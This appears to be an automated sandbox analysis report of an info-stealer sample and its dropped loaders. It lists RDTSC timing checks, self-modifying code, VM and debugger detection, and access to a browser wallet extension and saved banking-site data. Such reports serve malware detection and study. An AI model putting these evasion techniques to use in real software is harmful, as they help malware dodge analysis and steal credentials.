                      Source: C:\Users\user\DocumentsGDHDHJEBGH.exeRDTSC instruction interceptor: First address: A3B11D second address: A3B137 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F99A452D6D6h 0x00000009 rdtsc
                      Source: C:\Users\user\DocumentsGDHDHJEBGH.exeRDTSC instruction interceptor: First address: A3B137 second address: A3B159 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jc 00007F99A4D68168h 0x0000000c push ebx 0x0000000d pop ebx 0x0000000e pop edx 0x0000000f pop eax 0x00000010 push eax 0x00000011 push edx 0x00000012 pushad 0x00000013 jmp 00007F99A4D6816Dh 0x00000018 push eax 0x00000019 push edx 0x0000001a rdtsc
                      Source: C:\Users\user\DocumentsGDHDHJEBGH.exeRDTSC instruction interceptor: First address: A3B159 second address: A3B162 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 push eax 0x00000007 pop eax 0x00000008 popad 0x00000009 rdtsc
                      Source: C:\Users\user\DocumentsGDHDHJEBGH.exeRDTSC instruction interceptor: First address: A80359 second address: A80390 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F99A4D6816Bh 0x00000007 jp 00007F99A4D6817Ch 0x0000000d jmp 00007F99A4D68176h 0x00000012 pop edx 0x00000013 pop eax 0x00000014 push eax 0x00000015 push edx 0x00000016 push eax 0x00000017 push edx 0x00000018 jno 00007F99A4D68166h 0x0000001e pushad 0x0000001f popad 0x00000020 rdtsc
                      Source: C:\Users\user\DocumentsGDHDHJEBGH.exeRDTSC instruction interceptor: First address: A80390 second address: A803AC instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 pop esi 0x00000004 jmp 00007F99A452D6D2h 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push eax 0x0000000c push edx 0x0000000d pushad 0x0000000e popad 0x0000000f rdtsc
                      Source: C:\Users\user\DocumentsGDHDHJEBGH.exeRDTSC instruction interceptor: First address: A803AC second address: A803B8 instructions: 0x00000000 rdtsc 0x00000002 jg 00007F99A4D68166h 0x00000008 pushad 0x00000009 popad 0x0000000a pop edx 0x0000000b pop eax 0x0000000c rdtsc
                      Source: C:\Users\user\DocumentsGDHDHJEBGH.exeRDTSC instruction interceptor: First address: A803B8 second address: A803BD instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                      Source: C:\Users\user\DocumentsGDHDHJEBGH.exeRDTSC instruction interceptor: First address: A803BD second address: A803C5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edx 0x00000005 pop edx 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
                      Source: C:\Users\user\DocumentsGDHDHJEBGH.exeRDTSC instruction interceptor: First address: A8064C second address: A80650 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                      Source: C:\Users\user\DocumentsGDHDHJEBGH.exeRDTSC instruction interceptor: First address: A807B9 second address: A807D7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F99A4D68178h 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
                      Source: C:\Users\user\DocumentsGDHDHJEBGH.exeRDTSC instruction interceptor: First address: A83A1D second address: A83A62 instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 jne 00007F99A452D6C6h 0x00000009 pop edi 0x0000000a pop edx 0x0000000b pop eax 0x0000000c add dword ptr [esp], 3A3950C7h 0x00000013 mov si, E588h 0x00000017 jc 00007F99A452D6C6h 0x0000001d call 00007F99A452D6C9h 0x00000022 push eax 0x00000023 push edx 0x00000024 pushad 0x00000025 pushad 0x00000026 popad 0x00000027 jmp 00007F99A452D6D9h 0x0000002c popad 0x0000002d rdtsc
                      Source: C:\Users\user\DocumentsGDHDHJEBGH.exeRDTSC instruction interceptor: First address: A83A62 second address: A83A68 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push ecx 0x00000005 pop ecx 0x00000006 rdtsc
                      Source: C:\Users\user\DocumentsGDHDHJEBGH.exeRDTSC instruction interceptor: First address: A83A68 second address: A83A7A instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 pushad 0x0000000a push eax 0x0000000b push edx 0x0000000c jnc 00007F99A452D6C6h 0x00000012 rdtsc
                      Source: C:\Users\user\DocumentsGDHDHJEBGH.exeRDTSC instruction interceptor: First address: A83A7A second address: A83AA5 instructions: 0x00000000 rdtsc 0x00000002 jnp 00007F99A4D68166h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a ja 00007F99A4D68168h 0x00000010 push eax 0x00000011 pop eax 0x00000012 popad 0x00000013 mov eax, dword ptr [esp+04h] 0x00000017 pushad 0x00000018 js 00007F99A4D68170h 0x0000001e jmp 00007F99A4D6816Ah 0x00000023 pushad 0x00000024 push eax 0x00000025 push edx 0x00000026 rdtsc
                      Source: C:\Users\user\DocumentsGDHDHJEBGH.exeRDTSC instruction interceptor: First address: A83AA5 second address: A83AB5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 popad 0x00000008 mov eax, dword ptr [eax] 0x0000000a pushad 0x0000000b pushad 0x0000000c pushad 0x0000000d popad 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
                      Source: C:\Users\user\DocumentsGDHDHJEBGH.exeRDTSC instruction interceptor: First address: A83AB5 second address: A83ACD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 js 00007F99A4D68168h 0x0000000b pushad 0x0000000c popad 0x0000000d popad 0x0000000e mov dword ptr [esp+04h], eax 0x00000012 push eax 0x00000013 push edx 0x00000014 push eax 0x00000015 pushad 0x00000016 popad 0x00000017 pop eax 0x00000018 rdtsc
                      Source: C:\Users\user\DocumentsGDHDHJEBGH.exeRDTSC instruction interceptor: First address: A83BFB second address: A83C00 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                      Source: C:\Users\user\DocumentsGDHDHJEBGH.exeRDTSC instruction interceptor: First address: A84157 second address: A8415B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                      Source: C:\Users\user\DocumentsGDHDHJEBGH.exeRDTSC instruction interceptor: First address: A8415B second address: A84161 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                      Source: C:\Users\user\DocumentsGDHDHJEBGH.exeRDTSC instruction interceptor: First address: A841D7 second address: A841E5 instructions: 0x00000000 rdtsc 0x00000002 jbe 00007F99A4D68166h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b push edx 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
                      Source: C:\Users\user\DocumentsGDHDHJEBGH.exeRDTSC instruction interceptor: First address: A841E5 second address: A841E9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                      Source: C:\Users\user\DocumentsGDHDHJEBGH.exeRDTSC instruction interceptor: First address: A841E9 second address: A84204 instructions: 0x00000000 rdtsc 0x00000002 jo 00007F99A4D68166h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a popad 0x0000000b push eax 0x0000000c push edx 0x0000000d pushad 0x0000000e jmp 00007F99A4D6816Bh 0x00000013 push eax 0x00000014 push edx 0x00000015 rdtsc
                      Source: C:\Users\user\DocumentsGDHDHJEBGH.exeRDTSC instruction interceptor: First address: A84690 second address: A84699 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 pushad 0x00000006 popad 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
                      Source: C:\Users\user\DocumentsGDHDHJEBGH.exeRDTSC instruction interceptor: First address: A848B2 second address: A848B8 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push ecx 0x00000005 pop ecx 0x00000006 rdtsc
                      Source: C:\Users\user\DocumentsGDHDHJEBGH.exeRDTSC instruction interceptor: First address: A84971 second address: A84987 instructions: 0x00000000 rdtsc 0x00000002 js 00007F99A452D6C6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a pop ebx 0x0000000b push eax 0x0000000c push eax 0x0000000d push edx 0x0000000e jbe 00007F99A452D6CCh 0x00000014 push eax 0x00000015 push edx 0x00000016 rdtsc
                      Source: C:\Users\user\DocumentsGDHDHJEBGH.exeRDTSC instruction interceptor: First address: A84987 second address: A8498B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                      Source: C:\Users\user\Desktop\file.exeSpecial instruction interceptor: First address: F1FB29 instructions caused by: Self-modifying code
                      Source: C:\Users\user\Desktop\file.exeSpecial instruction interceptor: First address: F1D0B2 instructions caused by: Self-modifying code
                      Source: C:\Users\user\Desktop\file.exeSpecial instruction interceptor: First address: 10F8844 instructions caused by: Self-modifying code
                      Source: C:\Users\user\Desktop\file.exeSpecial instruction interceptor: First address: F1FA45 instructions caused by: Self-modifying code
                      Source: C:\Users\user\Desktop\file.exeSpecial instruction interceptor: First address: 10E0DF2 instructions caused by: Self-modifying code
                      Source: C:\Users\user\Desktop\file.exeSpecial instruction interceptor: First address: 115DD59 instructions caused by: Self-modifying code
                      Source: C:\Users\user\DocumentsGDHDHJEBGH.exeSpecial instruction interceptor: First address: 8CEB67 instructions caused by: Self-modifying code
                      Source: C:\Users\user\DocumentsGDHDHJEBGH.exeSpecial instruction interceptor: First address: A824B6 instructions caused by: Self-modifying code
                      Source: C:\Users\user\DocumentsGDHDHJEBGH.exeSpecial instruction interceptor: First address: B07627 instructions caused by: Self-modifying code
                      Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeSpecial instruction interceptor: First address: 45EB67 instructions caused by: Self-modifying code
                      Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeSpecial instruction interceptor: First address: 6124B6 instructions caused by: Self-modifying code
                      Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeSpecial instruction interceptor: First address: 697627 instructions caused by: Self-modifying code
                      Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeRegistry key queried: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{4d36e968-e325-11ce-bfc1-08002be10318}\0000 name: DriverDesc
                      Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeRegistry key queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System name: SystemBiosVersion
                      Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeRegistry key queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System name: VideoBiosVersion
                      Source: C:\Users\user\DocumentsGDHDHJEBGH.exeCode function: 26_2_04D60BAB rdtsc 26_2_04D60BAB
                      Source: C:\Users\user\Desktop\file.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\W1DLB4AP\vcruntime140[1].dllJump to dropped file
                      Source: C:\Users\user\Desktop\file.exeDropped PE file which has not been started: C:\ProgramData\nss3.dllJump to dropped file
                      Source: C:\Users\user\Desktop\file.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\W1DLB4AP\freebl3[1].dllJump to dropped file
                      Source: C:\Users\user\Desktop\file.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\W1DLB4AP\msvcp140[1].dllJump to dropped file
                      Source: C:\Users\user\Desktop\file.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\W1DLB4AP\nss3[1].dllJump to dropped file
                      Source: C:\Users\user\Desktop\file.exeDropped PE file which has not been started: C:\ProgramData\freebl3.dllJump to dropped file
                      Source: C:\Users\user\Desktop\file.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\W1DLB4AP\softokn3[1].dllJump to dropped file
                      Source: C:\Users\user\Desktop\file.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\W1DLB4AP\mozglue[1].dllJump to dropped file
                      Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\1009551001\knotc.exeJump to dropped file
                      Source: C:\Users\user\Desktop\file.exeDropped PE file which has not been started: C:\ProgramData\softokn3.dllJump to dropped file
                      Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\ATCVA5TX\knotc[1].exeJump to dropped file
                      Source: C:\Users\user\Desktop\file.exe TID: 7240Thread sleep time: -32016s >= -30000sJump to behavior
                      Source: C:\Users\user\Desktop\file.exe TID: 7220Thread sleep time: -58029s >= -30000sJump to behavior
                      Source: C:\Users\user\Desktop\file.exe TID: 7440Thread sleep time: -32000s >= -30000sJump to behavior
                      Source: C:\Users\user\Desktop\file.exe TID: 7224Thread sleep count: 33 > 30Jump to behavior
                      Source: C:\Users\user\Desktop\file.exe TID: 7224Thread sleep time: -66033s >= -30000sJump to behavior
                      Source: C:\Users\user\Desktop\file.exe TID: 7208Thread sleep time: -52026s >= -30000sJump to behavior
                      Source: C:\Users\user\Desktop\file.exe TID: 7236Thread sleep count: 32 > 30Jump to behavior
                      Source: C:\Users\user\Desktop\file.exe TID: 7236Thread sleep time: -64032s >= -30000sJump to behavior
                      Source: C:\Users\user\Desktop\file.exe TID: 7212Thread sleep time: -56028s >= -30000sJump to behavior
                      Source: C:\Users\user\Desktop\file.exe TID: 7216Thread sleep time: -46023s >= -30000sJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe TID: 8052Thread sleep time: -50025s >= -30000s
                      Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe TID: 3672Thread sleep count: 32 > 30
                      Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe TID: 3672Thread sleep time: -64032s >= -30000s
                      Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe TID: 8200Thread sleep count: 176 > 30
                      Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe TID: 8200Thread sleep time: -5280000s >= -30000s
                      Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe TID: 8200Thread sleep time: -30000s >= -30000s
                      Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
                      Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeLast function: Thread delayed
                      Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeLast function: Thread delayed
                      Source: C:\Users\user\DocumentsGDHDHJEBGH.exeFile Volume queried: C:\ FullSizeInformation
                      Source: C:\Users\user\Desktop\file.exeCode function: 2_2_6CE5EBF0 PR_GetNumberOfProcessors,GetSystemInfo,2_2_6CE5EBF0
                      Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeThread delayed: delay time: 30000
                      Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeThread delayed: delay time: 30000
                      Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\Jump to behavior
                      Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\_locales\Jump to behavior
                      Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\Jump to behavior
                      Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\css\Jump to behavior
                      Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\images\Jump to behavior
                      Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\html\Jump to behavior
                      Source: skotes.exe, skotes.exe, 0000001F.00000002.2522550350.00000000005E8000.00000040.00000001.01000000.0000000E.sdmpBinary or memory string: HARDWARE\ACPI\DSDT\VBOX__
                      Source: Web Data.15.drBinary or memory string: Interactive Brokers - GDCDYNVMware20,11696492231p
                      Source: Web Data.15.drBinary or memory string: Interactive Brokers - EU WestVMware20,11696492231n
                      Source: Web Data.15.drBinary or memory string: Canara Transaction PasswordVMware20,11696492231}
                      Source: Web Data.15.drBinary or memory string: interactivebrokers.co.inVMware20,11696492231d
                      Source: Web Data.15.drBinary or memory string: netportal.hdfcbank.comVMware20,11696492231
                      Source: Web Data.15.drBinary or memory string: outlook.office.comVMware20,11696492231s
                      Source: Web Data.15.drBinary or memory string: Interactive Brokers - non-EU EuropeVMware20,11696492231
                      Source: Web Data.15.drBinary or memory string: AMC password management pageVMware20,11696492231
                      Source: file.exe, 00000002.00000002.1858312701.0000000023DE1000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: VMware20,11696492231x
                      Source: Web Data.15.drBinary or memory string: interactivebrokers.comVMware20,11696492231
                      Source: Web Data.15.drBinary or memory string: microsoft.visualstudio.comVMware20,11696492231x
                      Source: file.exe, 00000002.00000002.1827339860.0000000001995000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000002.00000002.1827339860.0000000001962000.00000004.00000020.00020000.00000000.sdmp, skotes.exe, 0000001F.00000002.2529002580.00000000012AC000.00000004.00000020.00020000.00000000.sdmp, skotes.exe, 0000001F.00000002.2529002580.0000000001279000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW
                      Source: file.exe, 00000002.00000002.1858312701.0000000023E51000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: \??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\
                      Source: Web Data.15.drBinary or memory string: Interactive Brokers - COM.HKVMware20,11696492231
                      Source: Web Data.15.drBinary or memory string: Canara Change Transaction PasswordVMware20,11696492231^
                      Source: Web Data.15.drBinary or memory string: Test URL for global passwords blocklistVMware20,11696492231
                      Source: Web Data.15.drBinary or memory string: outlook.office365.comVMware20,11696492231t
                      Source: file.exe, 00000002.00000002.1858312701.0000000023DE1000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: 8RECOVE~11c3bankoRecoveryImprovedVMware20,11696492231x
                      Source: Web Data.15.drBinary or memory string: Interactive Brokers - NDCDYNVMware20,11696492231z
                      Source: Web Data.15.drBinary or memory string: discord.comVMware20,11696492231f
                      Source: Web Data.15.drBinary or memory string: global block list test formVMware20,11696492231
                      Source: Web Data.15.drBinary or memory string: www.interactivebrokers.comVMware20,11696492231}
                      Source: file.exe, 00000002.00000002.1858312701.0000000023E51000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: \??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
                      Source: Web Data.15.drBinary or memory string: dev.azure.comVMware20,11696492231j
                      Source: Web Data.15.drBinary or memory string: www.interactivebrokers.co.inVMware20,11696492231~
                      Source: Web Data.15.drBinary or memory string: bankofamerica.comVMware20,11696492231x
                      Source: Web Data.15.drBinary or memory string: trackpan.utiitsl.comVMware20,11696492231h
                      Source: knotc.exe.31.drBinary or memory string: jqEMu
                      Source: Web Data.15.drBinary or memory string: tasks.office.comVMware20,11696492231o
                      Source: file.exe, 00000002.00000002.1827339860.000000000191E000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: VMwareVMware
                      Source: Web Data.15.drBinary or memory string: account.microsoft.com/profileVMware20,11696492231u
                      Source: Web Data.15.drBinary or memory string: Canara Change Transaction PasswordVMware20,11696492231
                      Source: Web Data.15.drBinary or memory string: Interactive Brokers - EU East & CentralVMware20,11696492231
                      Source: Web Data.15.drBinary or memory string: ms.portal.azure.comVMware20,11696492231
                      Source: file.exe, 00000002.00000002.1825909989.00000000010B0000.00000040.00000001.01000000.00000003.sdmp, DocumentsGDHDHJEBGH.exe, 0000001A.00000002.1907396280.0000000000A58000.00000040.00000001.01000000.0000000B.sdmp, skotes.exe, 0000001B.00000002.1907056582.00000000005E8000.00000040.00000001.01000000.0000000E.sdmp, skotes.exe, 0000001E.00000002.1936400745.00000000005E8000.00000040.00000001.01000000.0000000E.sdmp, skotes.exe, 0000001F.00000002.2522550350.00000000005E8000.00000040.00000001.01000000.0000000E.sdmpBinary or memory string: Restart now?\\.\Oreans.vxd%s\Oreans.vxdXprotEventHARDWARE\ACPI\DSDT\VBOX__SeShutdownPrivilegeSoftware\WinLicenseCreateEvent API Error while extraction the driverGetEnvironmentVariable API Error while extraction the driverOpenSCManager API Error while extraction the driverCreateService API Error while extraction the driverCloseServiceHandle API Error while extraction the driverOpenService API Error while extraction the driverStartService API Error while extraction the driverAPIC error: Cannot find Processors Control Blocks. Please,
                      Source: Web Data.15.drBinary or memory string: turbotax.intuit.comVMware20,11696492231t
                      Source: Web Data.15.drBinary or memory string: secure.bankofamerica.comVMware20,11696492231|UE
                      Source: Web Data.15.drBinary or memory string: Canara Transaction PasswordVMware20,11696492231x
                      Source: Web Data.15.drBinary or memory string: Interactive Brokers - HKVMware20,11696492231]
                      Source: C:\Users\user\Desktop\file.exeSystem information queried: ModuleInformationJump to behavior
                      Source: C:\Users\user\Desktop\file.exeProcess information queried: ProcessInformationJump to behavior

                      Anti Debugging

                      barindex
                      Source: C:\Users\user\Desktop\file.exeThread information set: HideFromDebuggerJump to behavior
                      Source: C:\Users\user\DocumentsGDHDHJEBGH.exeThread information set: HideFromDebugger
                      Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeThread information set: HideFromDebugger
                      Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeThread information set: HideFromDebugger
                      Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeThread information set: HideFromDebugger
                      Source: C:\Users\user\DocumentsGDHDHJEBGH.exeCode function: 26_2_04D60C4D Start: 04D60C9D End: 04D60C8D26_2_04D60C4D
                      Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeOpen window title or class name: regmonclass
                      Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeOpen window title or class name: gbdyllo
                      Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeOpen window title or class name: process monitor - sysinternals: www.sysinternals.com
                      Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeOpen window title or class name: procmon_window_class
                      Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeOpen window title or class name: registry monitor - sysinternals: www.sysinternals.com
                      Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeOpen window title or class name: ollydbg
                      Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeOpen window title or class name: filemonclass
                      Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeOpen window title or class name: file monitor - sysinternals: www.sysinternals.com
                      Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeFile opened: NTICE
                      Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeFile opened: SICE
                      Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeFile opened: SIWVID
                      Source: C:\Users\user\Desktop\file.exeProcess queried: DebugPortJump to behavior
                      Source: C:\Users\user\Desktop\file.exeProcess queried: DebugPortJump to behavior
                      Source: C:\Users\user\Desktop\file.exeProcess queried: DebugPortJump to behavior
                      Source: C:\Users\user\DocumentsGDHDHJEBGH.exeProcess queried: DebugPort
                      Source: C:\Users\user\DocumentsGDHDHJEBGH.exeProcess queried: DebugPort
                      Source: C:\Users\user\DocumentsGDHDHJEBGH.exeProcess queried: DebugPort
                      Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeProcess queried: DebugPort
                      Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeProcess queried: DebugPort
                      Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeProcess queried: DebugPort
                      Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeProcess queried: DebugPort
                      Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeProcess queried: DebugPort
                      Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeProcess queried: DebugPort
                      Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeProcess queried: DebugPort
                      Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeProcess queried: DebugPort
                      Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeProcess queried: DebugPort
                      Source: C:\Users\user\DocumentsGDHDHJEBGH.exeCode function: 26_2_04D60BAB rdtsc 26_2_04D60BAB
                      Source: C:\Users\user\Desktop\file.exeCode function: 2_2_6CF2AC62 IsProcessorFeaturePresent,memset,memset,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,2_2_6CF2AC62
                      Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeCode function: 31_2_0042652B mov eax, dword ptr fs:[00000030h]31_2_0042652B
                      Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeCode function: 31_2_0042A302 mov eax, dword ptr fs:[00000030h]31_2_0042A302
                      Source: C:\Users\user\Desktop\file.exeCode function: 2_2_6CF2AC62 IsProcessorFeaturePresent,memset,memset,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,2_2_6CF2AC62
                      Source: C:\Users\user\Desktop\file.exeMemory protected: page guardJump to behavior

                      HIPS / PFW / Operating System Protection Evasion

                      barindex
                      Source: Yara matchFile source: Process Memory Space: file.exe PID: 5788, type: MEMORYSTR
                      Source: C:\Users\user\Desktop\file.exeProcess created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\system32\cmd.exe" /c start "" "C:\Users\user\DocumentsGDHDHJEBGH.exe"Jump to behavior
                      Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Users\user\DocumentsGDHDHJEBGH.exe "C:\Users\user\DocumentsGDHDHJEBGH.exe"
                      Source: C:\Users\user\DocumentsGDHDHJEBGH.exeProcess created: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe "C:\Users\user~1\AppData\Local\Temp\abc3bc1985\skotes.exe"
                      Source: C:\Users\user\Desktop\file.exeCode function: 2_2_6CF74760 malloc,InitializeSecurityDescriptor,SetSecurityDescriptorOwner,SetSecurityDescriptorGroup,GetLengthSid,GetLengthSid,GetLengthSid,malloc,InitializeAcl,AddAccessAllowedAce,AddAccessAllowedAce,AddAccessAllowedAce,SetSecurityDescriptorDacl,PR_SetError,GetLastError,free,GetLastError,GetLastError,free,free,free,2_2_6CF74760
                      Source: C:\Users\user\Desktop\file.exeCode function: 2_2_6CE51C30 GetCurrentProcess,OpenProcessToken,GetTokenInformation,GetLengthSid,malloc,CopySid,CopySid,GetTokenInformation,GetLengthSid,malloc,CopySid,CloseHandle,AllocateAndInitializeSid,GetLastError,PR_LogPrint,2_2_6CE51C30
                      Source: file.exe, file.exe, 00000002.00000002.1825909989.00000000010B0000.00000040.00000001.01000000.00000003.sdmpBinary or memory string: Program Manager
                      Source: C:\Users\user\Desktop\file.exeCode function: 2_2_6CF2AE71 cpuid 2_2_6CF2AE71
                      Source: C:\Users\user\Desktop\file.exeRegistry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0Jump to behavior
                      Source: C:\Users\user\Desktop\file.exeRegistry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0Jump to behavior
                      Source: C:\Users\user\Desktop\file.exeQueries volume information: C:\ VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\file.exeQueries volume information: C:\ VolumeInformationJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeQueries volume information: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe VolumeInformation
                      Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeQueries volume information: C:\Users\user\AppData\Local\Temp\1009551001\knotc.exe VolumeInformation
                      Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeQueries volume information: C:\Users\user\AppData\Local\Temp\1009551001\knotc.exe VolumeInformation
                      Source: C:\Users\user\Desktop\file.exeCode function: 2_2_6CF2A8DC GetSystemTimeAsFileTime,GetCurrentThreadId,GetCurrentProcessId,QueryPerformanceCounter,2_2_6CF2A8DC
                      Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeCode function: 31_2_003F65E0 LookupAccountNameA,31_2_003F65E0
